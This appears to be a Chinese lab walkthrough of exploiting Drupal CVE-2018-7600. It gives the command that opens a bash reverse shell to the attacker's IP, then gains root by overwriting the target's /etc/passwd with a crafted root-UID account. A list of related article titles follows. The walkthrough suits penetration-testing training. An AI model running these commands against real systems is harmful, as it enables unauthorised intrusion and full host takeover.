当前位置: 首页 > news >正文

靶场1

进入kali root权限

  • 反弹一个shell
    攻击机监听:
    nc -lvnp 10000
    目的主机:
    python3 drupa7-CVE-2018-7600.py http://210.26.72.210/drupal/ -c "bash -c 'bash -i >& /dev/tcp/210.26.72.230/10000 0>&1'"

  • 进入目标主机的命令行界面(Shell 环境)
    www-data@hackNos:/var/www/html/drupal$

  • 目标主机的命令行界面:
    cat passwd
    cat /etc/passwd
    攻击机:
    openssl passwd -1 -salt wyr 密码 生成密文
    cd /home
    mkdir wyr
    cd wyr
    touch passwd
    vim passwd(copy 目标主机文件/etc/passwd 最后一行加上wyr:$1$wyr$A20hHuKW8gs4c6LVmb270/:0:0:root:/root:/bin/bash)
    python3 -m http.server 9001

  • 目标主机的命令行界面:
    cd /etc
    wget http://210.26.72.230:9001/passwd -O /etc/passwd
    wget http://210.26.72.230:9001/passwd -O /var/www/html/drupal
    渗透测试中获取基础反向 shell 后(如通过 nc、bash 等方式),通常会立即执行这条命令,将 shell 升级为全交互模式:
    python3 -c 'import pty;pty.spawn("/bin/bash")'

  • su wyr

http://www.rkmt.cn/news/10976.html

相关文章:

  • 贝叶斯定理简单解释
  • 【CV】GAN代码解析:base_model.py
  • 学校站群框架如何开发插件实现Word图片的批量上传与编辑?
  • HarmonyOS事件订阅与通知:后台事件处理
  • HarmonyOS后台任务管理:短时与长时任务实战指南
  • Browser Use调用浏览器入门
  • 安防视频监控新时代:国标GB28181平台EasyGBS的可视化首页如何重塑运维与管理体验?
  • Manim实现镜面反射特效
  • 一些常用的网站
  • systemd-nspawn容器体积精简和桥接网络实战
  • 运维自动化工具Ansible大总结20250914 - 教程
  • 企业微信客服API模式接入第三方客服系统,对接大模型AI智能体
  • 深入解析:B树与B+树的原理区别应用
  • RHEL7/CentOS7 install NVIDIA drivers and CUDA
  • 浅谈 Burnside 和 Polya 的证明
  • 在Windows10 Edge浏览器里安装DeepSider大模型插件来免费运用gpt-4o、NanoBanana等AI大模型
  • 【杂记】原 hack
  • 124
  • 我的笔记记录方案
  • iOS Provisioning Profile 证书 描述文件
  • 告别多工具切换的低效时代:PandaWiki如何无缝集成企业现有工作流?
  • 压垮项目经理的“三座大山”:时间、成本、质量的生存法则与破局工具
  • 学习 React 前,你必须掌握的 10 个 JavaScript 核心概念
  • 二维下标极大数组(二维 map)
  • CF932E Team Work
  • KDL - 金山云数据湖系统参数
  • streamlit构建dashboard
  • vscode中element-plus组件无属性提示
  • minio集群搭建
  • 破局 “节能不省钱” 悖论:开源 EMS 生态如何让中小企业用 1/3 成本实现能效跃升?